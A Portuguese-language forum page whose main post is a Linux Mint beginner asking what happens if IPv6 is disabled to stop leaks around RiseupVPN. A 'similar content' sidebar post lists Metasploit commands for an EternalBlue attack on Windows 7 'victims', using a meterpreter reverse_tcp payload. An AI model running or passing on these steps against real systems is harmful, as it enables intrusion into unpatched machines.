Ir para conteúdo
Entre para seguir isso  
Visitante

Quais os ricos de se desativar o IPv6?

Recommended Posts

Visitante

Gosto de anonimanto e privacidade, sou mais um destes neuróticos por aí que quer ficar longe dos olhos das grandes corporações, empresas de poblicidade, trackers, etc., então gosto sempre de usar bloqueadores e vários outros serviços, como VPN, só que essa semana descobri algo que me deixou frustrado, "IPv6 e VPN". Sou um iniciante no Linux ainda, descubro coisas todos os dias e a descoberta da vez foi que os serviços de VPN comumente cobrem apenas o IPv4 deixando vazar então o endereço de IPv6, e meio que literalmente inutilizando o anonimanto que a VPN proporcionaria. Isso me deixou puto pra caralho, porque justamente o que quero é anonimanto, então o que pensei em fazer? Depois de tentar configurar por várias vezes o IPv6 para ficar anônimo de alguma forma, optei por desativá-lo. Daí vieram minhas dúvidas.

Quais as possíveis consequências de desativar o IPv6?

O IPv4 juntamente com a proteção que fornece a VPN daria uma segurança a nível (ou melhor) que a do IPv6? Porque sei que o IPv4 tem problemas de segurança, então a VPN poderia sana-los? 

Essa foi a única forma que encontrei de conseguir ficar anônimo quando se trata de endereços de IP, se alguém puder me indicar outras formas, como anonimizar o próprio IPv6, algo que não consegui.

Meu sistema operacional é o Linux Mint e uso a própria VPN que vem nele, configuro lá e acesso. Daí o serviço de VPN que uso pra acessar é do RiseupVPN.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

Entre para seguir isso  



  • Conteúdo Similar

    • Por explorerjust
      Ataque via ip que funciona apenas com windows 7.
       
      msfconsole
      ===scan pra saber se a vitima é vulneravel===
      use auxiliary/scanner/smb/smb_ms17_010
      set RHOSTS (com s no final msm) ip da vitima
      exploit
      se a vitima for vulneravel aparecera um aviso na tela falando que a vitima pode ser atacada
      ===usando exploit===
      use exploit/windows/smb/ms17_010_eternalblue
      set payload windows/(x64 para sistemas de 64 bits se nao for deixa sem nada e continua)/meterpreter/reverse_tcp
      set processname (nome que quiser para o processo)
      set LHOST (seu ip)
      set RHOST (ip da vitima)
      exploit
       
    • Visitante
      Por Visitante
      Gosto de anonimanto e privacidade, sou mais um destes neuróticos por aí que quer ficar longe dos olhos das grandes corporações, empresas de poblicidade, trackers, etc., então gosto sempre de usar bloqueadores e vários outros serviços, como VPN, só que essa semana descobri algo que me deixou frustrado, "IPv6 e VPN". Sou um iniciante no Linux ainda, descubro coisas todos os dias e a descoberta da vez foi que os serviços de VPN comumente cobrem apenas o IPv4 deixando vazar então o endereço de IPv6, e meio que literalmente inutilizando o anonimanto que a VPN proporcionaria. Isso me deixou puto pra caralho, porque justamente o que quero é anonimanto, então o que pensei em fazer? Depois de tentar configurar por várias vezes o IPv6 para ficar anônimo de alguma forma, optei por desativá-lo. Daí vieram minhas dúvidas.
      Quais as possíveis consequências de desativar o IPv6?
      O IPv4 juntamente com a proteção que fornece a VPN daria uma segurança a nível (ou melhor) que a do IPv6? Porque sei que o IPv4 tem problemas de segurança, então a VPN poderia sana-los? 
      Essa foi a única forma que encontrei de conseguir ficar anônimo quando se trata de endereços de IP, se alguém puder me indicar outras formas, como anonimizar o próprio IPv6, algo que não consegui.
      Meu sistema operacional é o Linux Mint e uso a própria VPN que vem nele, configuro lá e acesso. Daí o serviço de VPN que uso pra acessar é do RiseupVPN.
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.